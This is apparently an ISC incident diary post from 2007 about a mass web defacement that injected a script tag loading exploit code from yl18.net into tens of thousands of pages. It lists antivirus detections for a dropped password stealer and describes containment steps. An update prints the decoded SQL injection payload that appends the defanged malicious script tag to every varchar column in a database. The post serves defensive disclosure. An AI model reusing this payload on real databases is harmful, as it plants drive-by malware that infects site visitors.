yl18.net mass defacement
Zack wrote to us yesterday to report a mass defacement. After a brief look, we were able to confirm his finding that the following script tag (obfuscated) had been injected in over 40 000 pages across the internet, covering around 150 domains which we so far know of.
script src="hXXp://yl 18.net/0.js"
This script generates a page containing several hidden iframe components. These link to other pages that contain browser specific exploit code, such as the common ADODB exploit. This code downloads, without prompting, a small number of executable droppers, and executes them on vulnerable systems.
Upon review, most of the binaries downloaded appeared to be password stealers for online games, but not all have been reviewed yet. Anti virus coverage differed greatly between several binaries. Below is the virustotal output for one sample:
AhnLab-V3 2007.11.7.0 2007.11.06 - 
AntiVir 7.6.0.30 2007.11.06 TR/PSW.OnlineGames.gul 
Authentium 4.93.8 2007.11.05 - 
Avast 4.7.1074.0 2007.11.05 - 
AVG 7.5.0.503 2007.11.06 PSW.OnlineGames.QCP 
BitDefender 7.2 2007.11.06 Trojan.PWS.Onlinegames.NMG 
CAT-QuickHeal 9.00 2007.11.06 TrojanPSW.OnLineGames.gul 
ClamAV 0.91.2 2007.11.06 - 
DrWeb 4.44.0.09170 2007.11.06 Trojan.PWS.Gamania.5503 
eSafe 7.0.15.0 2007.10.28 suspicious Trojan/Worm 
eTrust-Vet 31.2.5270 2007.11.05 - 
Ewido 4.0 2007.11.06 - 
FileAdvisor 1 2007.11.06 - 
Fortinet 3.11.0.0 2007.10.19 - 
F-Prot 4.4.2.54 2007.11.06 - 
F-Secure 6.70.13030.0 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul 
Ikarus T3.1.1.12 2007.11.06 Trojan-PWS.Win32.OnLineGames.gul 
Kaspersky 7.0.0.125 2007.11.06 Trojan-PSW.Win32.OnLineGames.gul 
McAfee 5157 2007.11.06 - 
Microsoft 1.3007 2007.11.06 - 
NOD32v2 2641 2007.11.06 - 
Norman 5.80.02 2007.11.06 W32/OnLineGames.SPZ 
Panda 9.0.0.4 2007.11.06 Suspicious file 
Prevx1 V2 2007.11.06 Heuristic: Suspicious File With Persistence 
Rising 20.17.12.00 2007.11.06 - 
Sophos 4.23.0 2007.11.06 Mal/Packer 
Sunbelt 2.2.907.0 2007.11.06 VIPRE.Suspicious 
Symantec 10 2007.11.06 Infostealer.Gampass 
TheHacker 6.2.9.117 2007.11.06 - 
VBA32 3.12.2.4 2007.11.06 - 
VirusBuster 4.3.26:9 2007.11.06 Packed/FSG 
Webwasher-Gateway 6.0.1 2007.11.06 Trojan.PSW.OnlineGames.gul 
This type of widespread attack can incur a serious toll and requires follow up. At the ISC, we not only try to assess how to have a piece of malicious code taken down, but also what the attacker's next steps will be. We generally take at least the following steps to contain the incident:
- Inform the ISP hosting the malicious code. In this case, this was CHINANET, who have a massive deployed base and are not always able to respond promptly;
- If we receive no response or suspect a language issue, we inform the local incident response team (CSIRT/CERT) and ask them for assistance;
- We gather samples of the affected malicious code and distribute it to anti virus vendors to have them build coverage;
- If it’s an important issue, we report it here on the diary so organizations can implement controls to protect themselves against infection.
We also assess what the attacker spent most time working on. In this case, compromising a single server in China and hosting a malicious script is low effort and can easily be repeated. Attacking thousands of sites and adding a link to them is his actual investment.
As such, once the server is taken offline, the attacker will promptly move hosting for the yl18.net domain to another server. If the domain is likely fully malicious, we try to pre-empt this and inform the registrar that the domain is used for illegal activities and should be disabled.
This is a problem – most registrars do not really care what a domain is used for. Generally malicious domains are however paid for with fake credit cards, and if this can be identified, they have the legal ability to disable the domain.
These efforts take lots of time, and at this point in time, the server hosting yl18.net is still online and serving malicious code. Various .com web sites have been defaced with the script tag, most likely through SQL injection or cross site scripting, and are infecting their users.
If you have the ability to do so, we suggest blocking traffic to yl18.net at your gateway.
UPDATE: A reader wrote in with some information on how his site was compromised. He confirmed the SQL injection pathway. Fellow handler Bojan had a look at the SQL statement, which was CAST away as HEX in a variable:
declare @m varchar(8000);
set @m='';
select @m=@m+'update['+a.name+']set['+b.name+']=rtrim(convert(varchar,'+b.name+'))+''<script
src="hxxp://yl 18.net/0.js"></script>'';' from dbo.sysobjects
a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and
b.xtype=c.xtype and c.name='varchar'
set @m=REVERSE(@m)
set @m=substring(@m,PATINDEX('%;%',@m),8000);
set @m=REVERSE(@m);
exec(@m);
This code adds the malicious script tag to all user table objects which meet specific criteria (type varchar). It also explains why such a large number of pages per site have been affected.
--
Maarten Van Horenbeeck
 
              
Comments
Jason
Nov 6th 2007
1 decade ago
JJ
Nov 6th 2007
1 decade ago
http://www.dshield.org/diary.html?storyid=2178
Eric
Nov 8th 2007
1 decade ago